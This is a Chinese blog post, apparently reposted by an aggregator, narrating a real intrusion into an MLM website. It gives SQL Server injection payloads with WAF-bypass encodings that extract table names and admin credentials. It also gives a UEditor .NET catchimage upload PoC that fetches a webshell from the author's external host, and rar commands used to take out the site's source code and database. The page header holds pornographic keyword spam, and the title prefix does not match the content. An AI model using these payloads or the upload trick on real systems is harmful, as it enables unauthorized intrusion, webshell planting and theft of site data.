日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

pythom打包文件太大_从SQL注入到整站打包与本地搭建

發(fā)布時(shí)間:2023/12/10 数据库 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 pythom打包文件太大_从SQL注入到整站打包与本地搭建 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

一、前言

如題,由于是在已知有一處sql注入的情況下才接手進(jìn)行的后續(xù)操作,因此前面信息搜集則一筆帶過。

二、信息搜集

目標(biāo)是個(gè)本地的傳銷站點(diǎn)其大致信息為IIS+ASP.NET+安全狗、騰訊云。

三、Bypass Sql

3.1 Fuzz

空格 error 加號(hào) 未攔截 等號(hào) error 單引號(hào) error 雙引號(hào) 未攔截 雙括號(hào) 未攔截 +select error %0bselect 未攔截 %0bselect%0buser%0bfrom 未攔截 %0bselect%0buser%0bfrom%0badmin 攔截 convert() 未攔截

根據(jù)如上測(cè)試可以看出程序本身也有過濾,error為程序自身的過濾。可以利用IIS處理%符號(hào)的機(jī)制繞過部分符號(hào),例如空格使用%0b 加號(hào)使用%2b等。再根據(jù)測(cè)試的結(jié)果,可以先利用convert轉(zhuǎn)換報(bào)錯(cuò)獲取一部分信息。

goodscontent.aspx?gid=convert(int,@@version)#版本信息 goodscontent.aspx?gid=convert(int,db_name())#數(shù)據(jù)庫信息 goodscontent.aspx?gid=convert(int,user_name())#當(dāng)前數(shù)據(jù)庫用戶 …… tips:可以通過遍歷db_name(1)中的數(shù)字獲取其他庫名

得到以下信息:

ASP.NET 版本:Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400 數(shù)據(jù)庫版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) 用戶名:sa 計(jì)算機(jī)名:10_*_76_*SQLEXPRESS 10.*.76.* 當(dāng)前庫:pan20170823 所有庫名: pan20170823 master tempdb model msdb ReportServer$SQLEXPRESS ReportServer$SQLEXPRESSTempDB

再往下就是獲取表的信息

goodscontent.aspx?gid=CONVERT(INT,(CHAR(58)%2bCHAR(58)%2b(SELECT%0btop%0b1%0bCAST(COUNT(*)%0bAS%0bnvarchar(4000))%0bFROM%0binformation_schema.TABLES%0b)%2bCHAR(58)%2bCHAR(58)))#獲取表總個(gè)數(shù)

由于我只會(huì)簡(jiǎn)單的select from因此始終無法獲取表名,如果有其他姿勢(shì)還望給科普下。

3.2 萬金油

此時(shí)陷入僵局,后來想起在404大佬的一篇bypass安全狗的文章中提到過在mssql中注釋加換行同樣成立,遂構(gòu)造之。

goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0btable_name%0bFROM%0binformation_schema.tables%0b)--%20*/ PS:由于注入點(diǎn)已經(jīng)使用了convert做了數(shù)據(jù)轉(zhuǎn)換,后續(xù)直接防入查詢即可

獲取到第一個(gè)表名:jsrecord

由于還是沒能繞過單引號(hào)和等號(hào),我始終用不了not in與for xml path來爆后續(xù)的表名,這又觸及到了我知識(shí)盲區(qū),因此只好查閱大量文章案例,最終構(gòu)造出如下語句。

/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b11%0btable_name%0bFROM%0binformation_schema.columns))--%20*/

此時(shí)只需要遍歷top的數(shù)值即可,例如:

/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b80%0btable_name%0bFROM%0binformation_schema.columns))--%20*/

通過不斷的遍歷數(shù)值發(fā)現(xiàn)還是存在問題,舉個(gè)例子,即 1-20、200-209,334-345返回同一個(gè)表名,存在大量重復(fù)與無序的情況,但可以通過burp中intruder->Grep-Extact功能來解決,操作如下: 首先設(shè)置好intruder對(duì)001-600進(jìn)行遍歷(超過600多后就沒什么內(nèi)容了)

然后使用Grep-Extact提取表名。

保存結(jié)果后去重即可。

和前面獲取到的表總個(gè)數(shù)是一致的。

解下來就是獲取memberadmin表中的列名與內(nèi)容,但在此之前我還是習(xí)慣性的看了下后臺(tái)的網(wǎng)頁源代碼。

如圖,盲猜列名txt_nickname、nickname、txt_password、password

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bnickname%0bfrom%0bmemberadmin)--%20*/

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bpassword%0bfrom%0bmemberadmin)--%20*/

三、后臺(tái)getshell

登陸后臺(tái)

經(jīng)測(cè)試后發(fā)現(xiàn)信息管理處可以發(fā)布咨詢,上傳圖片。通過修改去掉filename="1.aspx"中的雙引號(hào)繞過安全狗,但無法繞過程序自身的檢測(cè)。

Content-Disposition: form-data; name="up_picture"; filename=xss.jpg .aspx

不過得知上傳組件為ueditor,且.net版本存在上傳漏洞 poc如下

<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <input type="submit" value="Submit" /> </form>

并在自己的服務(wù)器上準(zhǔn)備好shell(注意過狗),名稱為a.gif,然后填入shell地址

https://o0o0.club/a.gif?.aspx

提交后即可得到shell路徑

四、打包源碼與數(shù)據(jù)庫

在有了shell之后要做的事情就更明確了,即是打包源碼與數(shù)據(jù)庫,由于只需要這兩樣操作,相對(duì)于不需要太大的權(quán)限,避免操作不當(dāng)觸發(fā)警告。因此我選擇先通過shell來進(jìn)行打包操作。

源碼

這里利用的是自行上傳的rar.exe來分卷打包源碼,在此之前嘗試過7z.exe(目標(biāo)服務(wù)器上已安裝)、makecab 但效果并不理想,姿勢(shì)不夠還望科普。

rar.exe a -r -v50m -m5 pan20170823 *.* #a 壓縮 #-r 打包子目錄 #-v 分卷大小 #-m 壓縮等級(jí) #pan20170823目標(biāo)目錄 #*.* 打包后文件名為 pan20170823.part*.rar

最終以每秒100k的速度下載完成。

數(shù)據(jù)庫

略過,后臺(tái)自帶備份功能

坑點(diǎn):后臺(tái)的備份文件后綴為zip,下載回來總是提示文件損壞,一直以為備份功能有問題,后來發(fā)現(xiàn)文件頭是TAPE。。。。

五、本地搭建

本地搭建的環(huán)境為 Windows server 2012+IIS8+SQL Server 2008,簡(jiǎn)單講講0.0

SQL Server

安裝過程略過 導(dǎo)入數(shù)據(jù)

新建數(shù)據(jù)庫,然后通過原設(shè)備還原數(shù)據(jù)

還原成功

IIS與http://ASP.NET

安裝一筆帶過,左邊拉滿就行,簡(jiǎn)單粗暴

添加站點(diǎn)

最好對(duì)應(yīng)目標(biāo)版本

修改源碼中的配置文件

訪問

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的pythom打包文件太大_从SQL注入到整站打包与本地搭建的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。